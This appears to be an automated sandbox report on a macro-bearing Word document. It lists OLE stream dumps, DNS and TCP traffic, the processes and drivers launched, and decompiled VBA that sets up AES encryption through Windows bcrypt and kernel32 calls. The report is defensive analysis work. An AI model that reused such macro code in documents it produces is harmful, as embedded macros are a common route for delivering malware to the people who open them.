    Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
    Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 637
    General
    Stream Path:Macros/PROJECT
    CLSID:
    File Type:ASCII text, with CRLF line terminators
    Stream Size:637
    Entropy:5.316181456865122
    Base64 Encoded:True
    Data ASCII:I D = " { 8 C 4 D 9 E 8 1 - A C 0 C - 4 5 3 B - A 9 F 2 - 3 2 3 F 8 B D 6 B 2 D 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . C l a s s = k e o a o e . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 3 . . M o d u l e = M o d u l e 1 1 . . C l a s s = T h i s D o c u m e n t 1 . . H e l p F i l e = " 1 0 0 7 4 6 3 5 0 " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G
    Data Raw:49 44 3d 22 7b 38 43 34 44 39 45 38 31 2d 41 43 30 43 2d 34 35 33 42 2d 41 39 46 32 2d 33 32 33 46 38 42 44 36 42 32 44 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 43 6c 61 73 73 3d 6b 65 6f 61 6f 65 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 33 0d 0a 4d 6f 64
    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 179
    General
    Stream Path:Macros/PROJECTwm
    CLSID:
    File Type:data
    Stream Size:179
    Entropy:3.348554679064766
    Base64 Encoded:False
    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . k e o a o e . k . e . o . a . o . e . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . M o d u l e 1 1 . M . o . d . u . l . e . 1 . 1 . . . T h i s D o c u m e n t 1 . T . h . i . s . D . o . c . u . m . e . n . t . 1 . . . . .
    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6b 65 6f 61 6f 65 00 6b 00 65 00 6f 00 61 00 6f 00 65 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 4d 6f 64 75 6c 65 31 31 00 4d 00 6f 00 64 00 75 00 6c 00 65
    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 7153
    General
    Stream Path:Macros/VBA/_VBA_PROJECT
    CLSID:
    File Type:data
    Stream Size:7153
    Entropy:5.615254486098057
    Base64 Encoded:True
    Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
    Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 1899
    General
    Stream Path:Macros/VBA/__SRP_0
    CLSID:
    File Type:data
    Stream Size:1899
    Entropy:3.57014347674237
    Base64 Encoded:False
    Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a N ~ G q @ 1 ) T . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . .
    Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 04 00 06 00 04 00 06 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00 00 00 00
    Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 239
    General
    Stream Path:Macros/VBA/__SRP_1
    CLSID:
    File Type:data
    Stream Size:239
    Entropy:2.0304487142653334
    Base64 Encoded:True
    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 0 0 7 4 6 3 5 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff b1 00 00 00 00 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 532
    General
    Stream Path:Macros/VBA/__SRP_2
    CLSID:
    File Type:data
    Stream Size:532
    Entropy:2.0423409612990255
    Base64 Encoded:False
    Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . .
    Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 01 00 01 00 00 00 01 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08 00 00 00 00 00 00 00 00 00 00 71 08
    Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 156
    General
    Stream Path:Macros/VBA/__SRP_3
    CLSID:
    File Type:data
    Stream Size:156
    Entropy:1.7948868758912513
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e0 0d 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 711
    General
    Stream Path:Macros/VBA/dir
    CLSID:
    File Type:data
    Stream Size:711
    Entropy:6.534770648575581
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . . . ( . . @ . . . . . . . . 1 0 0 7 4 6 3 h 5 0 = . . . . . P . . . . . . . r i . $ . . . 4 . < . . . . . . . . s t d o l e . > . . s . t . d . . o . l . e . . . . h . . ^ . . * \\ G { . 0 0 0 2 0 4 3 0 v - . . . . C . . . . . . 0 . 0 4 6 } # 2 . 0 . # 0 # C : \\ W i . n d o w s \\ S y s t e m 3 2 \\ . e . 2 . t l b # O L . E A u t o m a p t i o n . 0 . . E N o r m a l E N C r . m . a F . . . { * \\ C . . . . @ r i . . ! O . f
    Data Raw:01 c3 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 11 00 28 00 00 40 02 14 06 00 09 01 00 0e 31 30 30 37 34 36 33 68 35 30 3d 0b 1c 07 02 90 01 50 08 05 06 12 09 02 12 a8 b3 72 69 0a 24 00 0c 01 34 00 3c 02 05 16 00 02 06 00 07 73 74 64 6f 6c 65 02 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d
    Stream Path: WordDocument, File Type: data, Stream Size: 4096
    General
    Stream Path:WordDocument
    CLSID:
    File Type:data
    Stream Size:4096
    Entropy:1.0974699740765002
    Base64 Encoded:False
    Data ASCII:. U . . . . . . . . . . . . . . . . . . . . . * . . . . . b j b j n n . . . . . . . . . . . . . . . . . . . . . . . . . . . a . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . .
    Data Raw:ec a5 c1 00 55 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 2a 08 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 89 04 e9 61 89 04 e9 61 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Jan 14, 2025 15:30:59.047852039 CET5265353192.168.2.251.1.1.1
    Jan 14, 2025 15:30:59.052768946 CET53526531.1.1.1192.168.2.25
    Jan 14, 2025 15:30:59.052912951 CET5265353192.168.2.251.1.1.1
    Jan 14, 2025 15:30:59.052964926 CET5265353192.168.2.251.1.1.1
    Jan 14, 2025 15:30:59.057939053 CET53526531.1.1.1192.168.2.25
    Jan 14, 2025 15:30:59.527347088 CET53526531.1.1.1192.168.2.25
    Jan 14, 2025 15:30:59.529818058 CET5265353192.168.2.251.1.1.1
    Jan 14, 2025 15:30:59.534883022 CET53526531.1.1.1192.168.2.25
    Jan 14, 2025 15:30:59.535007000 CET5265353192.168.2.251.1.1.1

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Jan 14, 2025 15:30:59.047410965 CET53523321.1.1.1192.168.2.25

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Jan 14, 2025 15:32:00.895347118 CET1.1.1.1192.168.2.250x3150No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
    Jan 14, 2025 15:32:00.895347118 CET1.1.1.1192.168.2.250x3150No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
    Jan 14, 2025 15:32:00.895347118 CET1.1.1.1192.168.2.250x3150No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
    Jan 14, 2025 15:32:00.895347118 CET1.1.1.1192.168.2.250x3150No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
    Jan 14, 2025 15:32:00.895347118 CET1.1.1.1192.168.2.250x3150No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
    Jan 14, 2025 15:32:00.895347118 CET1.1.1.1192.168.2.250x3150No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
    Jan 14, 2025 15:32:00.895347118 CET1.1.1.1192.168.2.250x3150No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
    Jan 14, 2025 15:32:00.895347118 CET1.1.1.1192.168.2.250x3150No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:09:30:52
    Start date:14/01/2025
    Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x7ff686540000
    File size:1'637'952 bytes
    MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:false

    General

    Target ID:14
    Start time:09:33:36
    Start date:14/01/2025
    Path:C:\Windows\System32\SystemSettingsBroker.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\SystemSettingsBroker.exe -Embedding
    Imagebase:0x7ff7a46c0000
    File size:220'536 bytes
    MD5 hash:899E65893CDEE7F9022DC9B583F94F0F
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:17
    Start time:09:33:37
    Start date:14/01/2025
    Path:C:\Windows\System32\drivers\rassstp.sys
    Wow64 process (32bit):false
    Commandline:
    Imagebase:0x7ff7c7360000
    File size:122'880 bytes
    MD5 hash:6931A955F0697B3A675E3F1B1B058D96
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:18
    Start time:09:33:37
    Start date:14/01/2025
    Path:C:\Windows\System32\drivers\ndproxy.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:122'880 bytes
    MD5 hash:8236B9B87FCB51A225A5B69A23C6DCBA
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:23
    Start time:09:33:38
    Start date:14/01/2025
    Path:C:\Windows\System32\drivers\agilevpn.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:147'456 bytes
    MD5 hash:9470BBB777C18559249CB627755AE05A
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:24
    Start time:09:33:38
    Start date:14/01/2025
    Path:C:\Windows\System32\drivers\rasl2tp.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:139'264 bytes
    MD5 hash:31026F5886DD4B3507C26173933722BE
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:25
    Start time:09:33:38
    Start date:14/01/2025
    Path:C:\Windows\System32\drivers\raspptp.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:139'264 bytes
    MD5 hash:DD210C0462E41139AA1E06AE8C82C6BA
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:26
    Start time:09:33:38
    Start date:14/01/2025
    Path:C:\Windows\System32\drivers\raspppoe.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:122'880 bytes
    MD5 hash:A664DB4B37AB3904F14242E7882469FB
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:27
    Start time:09:33:38
    Start date:14/01/2025
    Path:C:\Windows\System32\drivers\ndistapi.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:65'536 bytes
    MD5 hash:F2EB1438623A09E1659E5B5706D15B38
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:28
    Start time:09:33:38
    Start date:14/01/2025
    Path:C:\Windows\System32\drivers\ndiswan.sys
    Wow64 process (32bit):
    Commandline:
    Imagebase:
    File size:237'568 bytes
    MD5 hash:E63671FE12F81F56D79B1CC58305AD64
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Has exited:false

    General

    Target ID:30
    Start time:09:38:38
    Start date:14/01/2025
    Path:C:\Windows\System32\smartscreen.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\smartscreen.exe -Embedding
    Imagebase:0x7ff637f40000
    File size:630'784 bytes
    MD5 hash:D447511B1A99D72F21DC1A148F1A32A3
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Has exited:false

    Disassembly

    Code Analysis

    Call Graph

    Module: Module1

    Declaration
    LineContent
    1

    Attribute VB_Name = "Module1"

    Module: Module11

    Declaration
    LineContent
    1

    Attribute VB_Name = "Module11"

    Module: Module3

    Declaration
    LineContent
    1

    Attribute VB_Name = "Module3"

    3

    Option Explicit

    4

    DefObj A-Z

    12

    #if Win64 then

    13

    Private Const PTR_SIZE as Long = 8

    14

    #else

    15

    Private Const PTR_SIZE as Long = 4

    16

    #endif

    18

    #if HasPtrSafe then

    19

    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory"(lpvDest as Any, lpvSource as Any, ByVal cbCopy as LongPtr)

    20

    Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr"(Ptr() as Any) as LongPtr

    21

    Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong as Long) as Long

    22

    Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036"(RandomBuffer as Any, ByVal RandomBufferLength as Long) as Long

    24

    Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm as LongPtr, ByVal pszAlgId as LongPtr, ByVal pszImplementation as LongPtr, ByVal dwFlags as Long) as Long

    25

    Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm as LongPtr, ByVal dwFlags as Long) as Long

    26

    Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, pbOutput as Any, ByVal cbOutput as Long, cbResult as Long, ByVal dwFlags as Long) as Long

    27

    Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, ByVal pbInput as LongPtr, ByVal cbInput as Long, ByVal dwFlags as Long) as Long

    28

    Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phKey as LongPtr, pbKeyObject as Any, ByVal cbKeyObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long

    29

    Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey as LongPtr) as Long

    30

    Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal pPaddingInfo as LongPtr, ByVal pbIV as LongPtr, ByVal cbIV as Long, pbOutput as Any, ByVal cbOutput as Long, pcbResult as Long, ByVal dwFlags as Long) as Long

    31

    Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf as LongPtr, pbPassword as Any, ByVal cbPassword as Long, pbSalt as Any, ByVal cbSalt as Long, ByVal cIterations as Currency, pbDerivedKey as Any, ByVal cbDerivedKey as Long, ByVal dwFlags as Long) as Long

    32

    Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phHash as LongPtr, ByVal pbHashObject as LongPtr, ByVal cbHashObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long

    33

    Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash as LongPtr) as Long

    34

    Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal dwFlags as Long) as Long

    35

    Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash as LongPtr, pbOutput as Any, ByVal cbOutput as Long, ByVal dwFlags as Long) as Long

    36

    #else

    Non-Executed Functions

    Function

    pvCryptoAesCtrInitAPIs: 45, Strings: 6, Number of lines: 62, Relevance: 91.062

    APIsMeta Information

    vbNullString

    vbNullString

    AES_IVLEN

    UBound

    BCryptOpenAlgorithmProvider

    StrPtr

    KDF_HASH

    MS_PRIMITIVE_PROVIDER

    BCRYPT_ALG_HANDLE_HMAC_FLAG

    BCryptDeriveKeyPBKDF2

    pvArrayPtr

    pvArraySize

    KDF_ITER

    UBound

    BCryptOpenAlgorithmProvider

    StrPtr

    MS_PRIMITIVE_PROVIDER

    BCryptGetProperty

    StrPtr

    BCryptSetProperty

    StrPtr

    BCryptGenerateSymmetricKey

    CopyMemory

    AES_IVLEN

    BCryptOpenAlgorithmProvider

    StrPtr

    HMAC_HASH

    MS_PRIMITIVE_PROVIDER

    BCRYPT_ALG_HANDLE_HMAC_FLAG

    BCryptGetProperty

    StrPtr

    BCryptCreateHash

    AES_IVLEN

    LastError

    Part of subcall function GetSystemMessage@Module3: Space$

    Part of subcall function GetSystemMessage@Module3: FormatMessage

    Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM

    Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS

    Part of subcall function GetSystemMessage@Module3: Len

    Part of subcall function GetSystemMessage@Module3: Mid$

    Part of subcall function GetSystemMessage@Module3: vbCrLf

    Part of subcall function GetSystemMessage@Module3: Left$

    Part of subcall function GetSystemMessage@Module3: Hex

    LastError

    ERR_UNSUPPORTED_ENCR

    StringsDecrypted Strings
    "Microsoft Primitive Provider"
    "AES"
    "ObjectLength"
    "ChainingMode"
    "ChainingModeECB"
    "HashDigestLength"
    LineInstructionMeta Information
    299

    Private Function pvCryptoAesCtrInit(uCtx as UcsCryptoContextType, baPass() as Byte, baSalt() as Byte, baDerivedKey() as Byte, ByVal lKeyLen as Long) as Boolean

    300

    Const MS_PRIMITIVE_PROVIDER as String = "Microsoft Primitive Provider"

    301

    Const BCRYPT_ALG_HANDLE_HMAC_FLAG as Long = 8

    302

    Dim hResult as Long

    304

    With uCtx

    306

    . EncrData = vbNullString

    vbNullString

    307

    . EncrPos = 0

    308

    . LastError = vbNullString

    vbNullString

    309

    Redim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1)

    AES_IVLEN

    310

    If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then

    UBound

    312

    On Error Goto EH_Unsupported

    313

    hResult = BCryptOpenAlgorithmProvider(. hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)

    BCryptOpenAlgorithmProvider

    StrPtr

    KDF_HASH

    MS_PRIMITIVE_PROVIDER

    BCRYPT_ALG_HANDLE_HMAC_FLAG

    314

    If hResult < 0 Then

    315

    Goto QH

    316

    Endif

    317

    hResult = BCryptDeriveKeyPBKDF2(. hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt), KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)

    BCryptDeriveKeyPBKDF2

    pvArrayPtr

    pvArraySize

    KDF_ITER

    UBound

    319

    If hResult < 0 Then

    320

    Goto QH

    321

    Endif

    322

    On Error Goto 0

    323

    Endif

    325

    On Error Goto EH_Unsupported

    326

    hResult = BCryptOpenAlgorithmProvider(. hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)

    BCryptOpenAlgorithmProvider

    StrPtr

    MS_PRIMITIVE_PROVIDER

    327

    If hResult < 0 Then

    328

    Goto QH

    329

    Endif

    330

    On Error Goto 0

    331

    hResult = BCryptGetProperty(. hAesAlg, StrPtr("ObjectLength"), . AesKeyObjLen, 4, 0, 0)

    BCryptGetProperty

    StrPtr

    332

    If hResult < 0 Then

    333

    Goto QH

    334

    Endif

    335

    hResult = BCryptSetProperty(. hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)

    BCryptSetProperty

    StrPtr

    336

    If hResult < 0 Then

    337

    Goto QH

    338

    Endif

    339

    ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte ' BAD !

    340

    hResult = BCryptGenerateSymmetricKey(. hAesAlg, . hAesKey, . AesKeyObjData(0), . AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)

    BCryptGenerateSymmetricKey

    341

    If hResult < 0 Then

    342

    Goto QH

    343

    Endif

    345

    Call CopyMemory(. Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)

    CopyMemory

    AES_IVLEN

    347

    hResult = BCryptOpenAlgorithmProvider(. hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)

    BCryptOpenAlgorithmProvider

    StrPtr

    HMAC_HASH

    MS_PRIMITIVE_PROVIDER

    BCRYPT_ALG_HANDLE_HMAC_FLAG

    348

    If hResult < 0 Then

    349

    Goto QH

    350

    Endif

    351

    hResult = BCryptGetProperty(. hHmacAlg, StrPtr("HashDigestLength"), . HashLen, 4, 0, 0)

    BCryptGetProperty

    StrPtr

    352

    If hResult < 0 Then

    353

    Goto QH

    354

    Endif

    355

    hResult = BCryptCreateHash(. hHmacAlg, . hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - . HashLen), . HashLen, 0)

    BCryptCreateHash

    AES_IVLEN

    356

    If hResult < 0 Then

    357

    Goto QH

    358

    Endif

    359

    End With

    361

    pvCryptoAesCtrInit = True

    362

    Exit Function

    362

    QH:

    364

    uCtx.LastError = GetSystemMessage(hResult)

    LastError

    365

    Exit Function

    365

    EH_Unsupported:

    367

    uCtx.LastError = ERR_UNSUPPORTED_ENCR

    LastError

    ERR_UNSUPPORTED_ENCR

    368

    End Function

    Function

